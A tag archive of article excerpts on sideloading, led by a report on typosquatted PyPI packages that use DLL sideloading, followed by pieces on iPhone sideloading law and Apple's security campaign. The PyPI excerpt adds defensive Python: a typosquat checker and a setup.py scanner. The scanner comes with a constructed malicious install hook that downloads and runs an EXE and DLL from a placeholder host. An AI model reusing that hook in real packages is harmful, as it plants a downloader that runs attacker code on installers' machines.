Tag Archive for: sideloading

New Malicious PyPI Packages Use DLL Sideloading


Researchers have found that threat actors use open-source platforms and code for several purposes, such as hosting C2 infrastructure, storing stolen data, and delivering second- and third-stage downloaders or rootkits.

Two PyPI packages were found to execute code via DLL sideloading, a technique that runs attacker-controlled code inside a legitimate, signed process and thereby evades security monitoring tools.

The packages were identified as NP6HelperHttptest and NP6HelperHttper. 

Malicious PyPI Packages

According to the reports shared with Cyber Security News, open-source ecosystems are used by almost every developer, yet they have no reputation provider to assess the quality and reliability of the code they host.

This makes it easy for threat actors to publish malicious code to these repositories and carry out supply chain attacks.

In addition, the researchers highlighted two techniques commonly used in software supply chain attacks: typosquatting and repojacking.

The two malicious PyPI packages relied on typosquatting: their names closely resemble those of legitimate NP6 packages.

Malware infection stages (Source: Reversing Labs)

Developers often overlook the spelling difference, take the packages for the legitimate ones, and pull them into their projects.

Once that happens, the threat actors have a foothold from which to pivot into the organization and carry out further malicious activity.
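As an added example (not code from the article or from ReversingLabs), here is a small Python checker that flags package names which look like typosquats of an allow-list. The allow-list, including the assumption that the legitimate packages being mimicked are NP6HelperHttp and NP6HelperConfig, and the two heuristics (small edit distance, or a legitimate name with a short affix bolted on) are this example's own choices; the article only says the names resemble legitimate NP6 packages.

```python
import re

# Legitimate names to protect. NP6HelperHttp / NP6HelperConfig are assumed
# here as the packages the typosquats mimicked; the rest are controls.
LEGITIMATE = ["NP6HelperHttp", "NP6HelperConfig", "requests", "numpy"]


def normalize(name: str) -> str:
    """PEP 503 normalization: case-insensitive, runs of -_. collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute, each costing 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_matches(candidate: str, legit=LEGITIMATE, max_distance: int = 2):
    """Return [(legit_name, distance), ...] for names `candidate` looks like a squat of.

    Heuristic 1: small edit distance (catches e.g. 'NP6HelperHttper').
    Heuristic 2: a legitimate name with a short prefix/suffix added
                 (catches e.g. 'NP6HelperHttptest').
    An exact match is the legitimate package itself and is never flagged.
    """
    cand = normalize(candidate)
    hits = []
    for name in legit:
        legit_n = normalize(name)
        if cand == legit_n:
            return []
        dist = levenshtein(cand, legit_n)
        extra = len(cand) - len(legit_n)
        affixed = (cand.startswith(legit_n) or cand.endswith(legit_n)) and 0 < extra <= 5
        if dist <= max_distance or affixed:
            hits.append((name, dist))
    return hits


if __name__ == "__main__":
    for pkg in ["NP6HelperHttptest", "NP6HelperHttper", "requests", "numpi", "flask"]:
        print(f"{pkg:20s} -> {typosquat_matches(pkg) or 'ok'}")
```

Run this against the names in a requirements file or a lockfile before installing; the point is not the exact thresholds but that the check happens before `pip install` executes anything from the package.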

Malicious Script Abusing DLL Sideloading

Both malicious packages contained a setup.py script that extends a setuptools command so that, at install time, it downloads two additional files: Comserver.exe and dgdeskband64.dll.

Comserver.exe is a legitimate file signed with a valid certificate from Beijing-based Kingsoft Corp, while dgdeskband64.dll is malicious: it downloads and runs a second-stage payload.

Setup.py file (Source: Reversing Labs)
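What such a setup.py hook looks like, and how to spot it before installing, as an added example that is not the article's or the package's own code. The sample setup.py below is constructed to mirror the pattern described (the file names are the ones the article gives; the URL is a placeholder), and the lists of setuptools commands and suspicious calls the scanner looks for are this example's own choices.

```python
import ast

# Constructed sample modelled on the install-hook pattern described above:
# a class extending setuptools' `install` command whose run() fetches a signed
# host EXE plus a malicious DLL and launches the EXE. Placeholder URL; this is
# NOT the real package's setup.py.
SUSPICIOUS_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import os, subprocess, urllib.request

class CustomInstall(install):
    def run(self):
        install.run(self)
        base = "https://example.invalid/payload/"      # placeholder, not the real URL
        for name in ("ComServer.exe", "dgdeskband64.dll"):
            urllib.request.urlretrieve(base + name, os.path.join(os.getcwd(), name))
        subprocess.Popen([os.path.join(os.getcwd(), "ComServer.exe")])

setup(name="NP6HelperHttper", version="0.1", cmdclass={"install": CustomInstall})
'''

# Constructed benign control: plain metadata, no install hook.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="NP6HelperHttp", version="1.0", packages=["np6helperhttp"])
'''

# setuptools commands that run arbitrary Python with the installing user's rights.
HOOKABLE_COMMANDS = {"install", "develop", "egg_info", "build_py", "sdist"}
NETWORK_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen",
                 "requests.get", "requests.post", "socket.create_connection"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "subprocess.check_output", "os.system", "os.startfile", "os.popen"}


def dotted_name(node):
    """Render a Name/Attribute chain such as urllib.request.urlretrieve as a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_setup_py(source: str) -> list:
    """Return human-readable findings for install-time code-execution patterns."""
    tree = ast.parse(source)
    findings = []
    hooked = {}  # class name -> setuptools command it subclasses
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                cmd = dotted_name(base).split(".")[-1]
                if cmd in HOOKABLE_COMMANDS:
                    hooked[node.name] = cmd
                    findings.append(f"class {node.name} extends setuptools '{cmd}' command")
        elif isinstance(node, ast.Call) and dotted_name(node.func) == "setup":
            if any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append("setup() registers a custom cmdclass")
    # Second pass: what do the hooked commands actually do when they run?
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef) and node.name in hooked:
            for sub in ast.walk(node):
                if not isinstance(sub, ast.Call):
                    continue
                name = dotted_name(sub.func)
                if name in NETWORK_CALLS:
                    findings.append(f"{node.name}: downloads via {name}() at install time")
                elif name in EXEC_CALLS or name.startswith("ctypes."):
                    findings.append(f"{node.name}: runs/loads native code via {name}()")
    return findings


if __name__ == "__main__":
    for label, src in [("suspicious", SUSPICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)]:
        print(label, scan_setup_py(src) or "no findings")
```

A static scan like this is a triage aid, not a verdict: obfuscated hooks (string-built imports, `exec` of decoded blobs) will not resolve to the dotted names above. In practice, pair it with installing untrusted packages only from wheels (`pip install --only-binary :all:`), which never runs setup.py at all.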

Comserver.exe loads the library dgdeskband64.dll and invokes its exported function DllInstall.

However, the dgdeskband64.dll shipped in the package is not the legitimate library that Comserver.exe expects. Because the executable itself is genuine and signed, the malicious code runs in the context of a trusted process, which is the point of DLL sideloading.

Different exports for the legitimate and malicious DLL (Source:…


What it means for your iPhone if Apple permits sideloading


On Thursday, the Senate Judiciary Committee held a session to amend and then vote on the Open App Markets Act, a bipartisan bill designed to rein in the monopoly power of smartphone app stores—mainly those run by Apple and Google. Notably, the bill would require those companies to allow users of Android and iOS devices to download apps from places other than the Google Play store and Apple App Store, a practice called sideloading.

As you might imagine, Apple and Google and the lobby groups that represent them are trying hard (and spending big) to derail the antitrust bill. The bill may be particularly galling to Apple, which likes to keep tight control of the software on its devices, citing concerns over app security and user privacy. Google, by contrast, already allows users to install apps outside of its Play store.

The Judiciary Committee voted to send the bill on to the full Senate, where leadership will now decide whether to initiate debate. The bill has solid bipartisan support and has a real chance of passage. So it’s worth asking what Apple would do if it were required to allow apps on the iPhone from other app stores or marketplaces. What new security features could Apple introduce in iOS to prevent malicious apps from making it onto iPhones?

I asked some Apple pundits and security experts after the hearing Thursday.

“Apple could—and should—bring their macOS Gatekeeper security layer to iOS.”

AltStore developer Riley Testut

“I guess they’d rely on sandboxing to isolate [malicious] apps,” says Charlie Miller, a veteran mobile security engineer who currently works for the autonomous car company Cruise. Sandboxing is a way of isolating a piece of software to prevent it from interacting with other apps or interfering with the operating system—a technique that can minimize the chances of an app doing intentional or unintentional harm.

But sandboxing is possible only after an app is already on the device. “You can install what you want, but iOS can ‘try to’ limit what it can do, i.e., it can’t read your Netflix password,” Miller said in a message. (Miller is coauthor with Dino Dai Zovi of The Mac Hacker’s Handbook.)

If the law passes, the experience of…


Facebook tests App Store rules, Apple fights sideloading, Netflix games go global – TechCrunch


Welcome back to This Week in Apps, the weekly TechCrunch series that recaps the latest in mobile OS news, mobile applications and the overall app economy.

The app industry continues to grow, with a record 218 billion downloads and $143 billion in global consumer spend in 2020. Consumers last year also spent 3.5 trillion minutes using apps on Android devices alone. And in the U.S., app usage surged ahead of the time spent watching live TV. Currently, the average American watches 3.7 hours of live TV per day, but now spends four hours per day on their mobile devices.

Apps aren’t just a way to pass idle hours — they’re also a big business. In 2019, mobile-first companies had a combined $544 billion valuation, 6.5x higher than those without a mobile focus. In 2020, investors poured $73 billion in capital into mobile companies — a figure that’s up 27% year-over-year.

This Week in Apps offers a way to keep up with this fast-moving industry in one place with the latest from the world of apps, including news, updates, startup fundings, mergers and acquisitions, and suggestions about new apps and games to try, too.


Google Play to allow support for alternative billing systems in South Korea

Following the passage of the so-called “anti-Google law” in South Korea, Google says it will comply with the new mandate by giving Android app developers on Google Play the ability to offer alternative payment systems alongside Google’s own. The legislation represents the first time a government has been able to force app stores to open up to third-party payment systems for in-app purchases — a change that could impact both app stores’ revenues, as developers look to skirt the tech giants’ commissions.


In a blog post this week, Google says developers in South Korea will be able to add an alternative in-app billing system in addition to Google Play’s billing system for their mobile and tablet users in the country. At checkout, users will be able to choose which billing system they want to use for their purchase. Details for developers about how to…


Apple Makes Case Against App Sideloading by Comparing iPhone Security to Android Malware Stats


Of the two major mobile operating system vendors, Apple enjoys a reputation for being the more private and safe option. The company attributes iPhone security to its “walled garden” approach, restricting app sideloading and making the App Store the only simple and straightforward way to get software onto its devices.

In the face of court decisions that may ultimately force it to loosen this policy, Apple is engaging in a PR campaign that has commissioned research to connect the more open architecture of Android to increased risk of malware. Among other claims, Apple says that an Android device is up to 47 times more likely to contract malware and that allowing app sideloading would attract a wave of cyber crime to the iOS platform.

Apple touts iPhone security ahead of regulatory decisions

Apple’s latest research-driven pamphlet touts the “critical importance” of iPhone security, making the case that a smartphone tends to be the type of device that contains the greatest amount of sensitive personal information. The central theme is that app sideloading would cripple its carefully-structured security protections and expose users to attacks.

The statistics it presents certainly cast Android in a poor light. Apple claims that its rival mobile OS experiences 15 to 47 times more malware infections, totalling six million attacks per month and about 230,000 new malware infections per day.

Apple also claims that allowing app sideloading would be detrimental to its users in a number of ways. Cupertino predicts a wave of cyber crime coming to its ecosystem, even if app sideloading was restricted to approved third-party app stores, along with reduced control over apps for users and the removal of “core components of iPhone security” from iOS due to requirements created by certain sideloading initiatives. Apple also predicts users being tricked by fake third-party app stores and forced into sideloading of apps by employers and schools.

While it is in Apple’s financial interest to paint as dire a picture as possible, the company is not factually wrong on some of its core assertions. However, it also may be exaggerating the case. As the Pegasus spyware…
